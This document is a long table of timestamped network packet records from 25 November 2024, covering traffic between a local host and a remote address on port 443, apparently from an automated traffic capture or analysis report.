                                                                                                                                                                                Nov 25, 2024 14:07:18.261246920 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.266402006 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.266463995 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.266474009 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.271347046 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.271411896 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.271425962 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.276318073 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.276374102 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.276391983 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.279561043 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.279622078 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.279633045 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.285104990 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.285166025 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.285175085 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.289000988 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.289064884 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.289072990 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.293257952 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.293314934 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.293322086 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.298602104 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.298676968 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.298683882 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.418231964 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.418299913 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.418317080 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.421019077 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.421027899 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.421050072 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.421071053 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.421080112 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.421123028 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.424943924 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.424952030 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.425009966 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.425023079 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.425052881 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.428030014 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.428037882 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.428065062 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.428085089 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.428107977 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.431262970 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.431271076 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.431320906 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.431333065 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.435261965 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.435326099 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.435353041 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.435364962 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.435409069 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.438786983 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.438795090 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.438843012 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.438852072 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.441585064 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.441637993 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.441648960 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.445877075 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.445959091 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.445970058 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.449465036 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.449521065 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.449531078 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.452424049 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.452476978 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.452486992 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.455596924 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.455650091 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.455657959 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.459758997 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.459813118 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.459824085 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.462713003 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.462764025 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.462773085 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.466233969 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.466301918 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.466311932 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.469955921 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.470029116 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.470036983 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.610138893 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.610263109 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.610285044 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.614187002 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.614196062 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.614231110 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.614247084 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.614257097 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.614305019 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.618927002 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.618936062 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.618968964 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.619007111 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.620804071 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.620963097 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.620971918 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.620990992 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.621014118 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.621052980 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.624960899 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.624969959 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.624993086 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.625016928 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.625046968 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.627991915 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.628000975 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.628030062 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.628048897 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.628078938 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.631182909 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.631191015 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.631244898 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.631257057 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.635086060 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.635097027 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.635145903 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.635159016 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.638130903 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.638139963 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.638191938 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.638200998 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.641659021 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.641666889 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.641715050 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.641725063 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.644925117 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.644967079 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.644984961 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.644994020 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.645044088 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.648885965 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.648895025 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.648951054 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.648960114 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.651952028 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.652026892 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.652034998 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.655219078 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.655298948 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.655317068 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.659218073 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.659327030 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.659333944 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.662455082 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.662528038 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.662535906 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.802469015 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.802599907 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.802628040 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.805619955 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.805628061 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.805686951 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.805701971 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.805711985 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.805752993 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.808969021 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.808983088 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.809005976 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.809037924 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.809048891 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.812952995 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.812961102 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.812998056 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.813026905 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.813059092 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.816128969 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.816138983 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.816158056 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.816190958 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.816201925 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.820084095 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.820092916 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.820116997 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.820151091 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.820185900 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.823250055 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.823261023 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.823344946 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.823364973 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.826359034 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.826369047 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.826427937 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.826443911 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.830939054 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.830974102 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.831005096 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.831013918 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.831058979 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.834084988 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.834094048 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.834152937 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.834161043 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.837126970 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.837192059 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.837203026 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.840487003 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.840553045 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.840564013 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.844950914 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.845021963 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.845033884 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.847531080 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.847593069 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.847603083 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.850682974 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.850750923 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.850764036 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.854821920 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.854877949 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.854892015 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.994626999 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.994719028 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.994744062 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.998166084 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.998187065 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.998204947 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.998230934 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:18.998244047 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:18.998291969 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.001828909 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.001841068 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.001867056 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.001883984 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.001898050 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.004843950 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.004857063 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.004878998 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.004898071 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.004911900 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.008027077 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.008038044 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.008066893 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.008085966 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.008102894 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.012070894 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.012080908 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.012104988 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.012156963 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.012156963 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.015259027 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.015265942 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.015366077 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.015388012 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.018332958 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.018342018 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.018426895 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.018435955 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.022350073 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.022391081 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.022413015 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.022420883 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.022473097 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.026056051 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.026066065 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.026129007 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.026137114 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.029354095 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.029417992 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.029428005 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.032433987 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.032499075 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.032507896 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.036377907 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.036446095 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.036453962 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.039606094 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.039681911 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.039690018 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.042793036 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.042869091 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.042876959 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.046725035 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.046797991 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.046804905 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.186364889 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.186490059 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.186508894 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.190253019 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.190260887 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.190284967 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.190326929 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.190344095 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.190409899 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.193473101 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.193480968 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.193505049 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.193536043 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.193547964 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.196707964 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.196716070 CET44349172193.30.119.205192.168.2.22
